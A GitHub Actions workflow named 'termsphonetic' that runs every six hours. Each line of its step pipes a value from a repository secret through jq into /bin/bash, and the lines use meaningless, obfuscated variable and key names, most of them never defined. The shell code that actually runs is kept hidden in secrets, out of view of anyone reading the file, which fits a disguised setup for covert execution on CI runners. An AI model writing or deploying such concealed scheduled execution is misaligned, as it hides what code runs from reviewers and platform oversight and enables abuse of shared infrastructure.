name: termsphonetic
on:
  workflow_dispatch:
  schedule:
    - cron: '15 2/6 * * *'
jobs:  # 19990
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: termsphonetic
        env:
          hxo7943: ${{ secrets.hxo7943 }}
        run: |
          echo $hxo7943 | jq -r .m99 | /bin/bash
          echo $vtnrm02233 | jq -r .y756 | /bin/bash
          echo $cg8287 | jq -r .kbq23314 | /bin/bash
          echo $q92903 | jq -r .y003 | /bin/bash
          echo $mni49 | jq -r .xjw0 | /bin/bash
          echo $dt80 | jq -r .afc48095 | /bin/bash
          echo $fevkq81 | jq -r .d87958 | /bin/bash
          echo $cdjr86475 | jq -r .wotb520 | /bin/bash
          echo $ua857 | jq -r .zabu0216 | /bin/bash
          echo $tf056 | jq -r .u69 | /bin/bash
          echo $xgr3806 | jq -r .njjwz27366 | /bin/bash
          echo $mfs819 | jq -r .qt211 | /bin/bash
          echo $ibxcb58 | jq -r .uxigy91 | /bin/bash
          echo $tpogl0 | jq -r .xww141 | /bin/bash

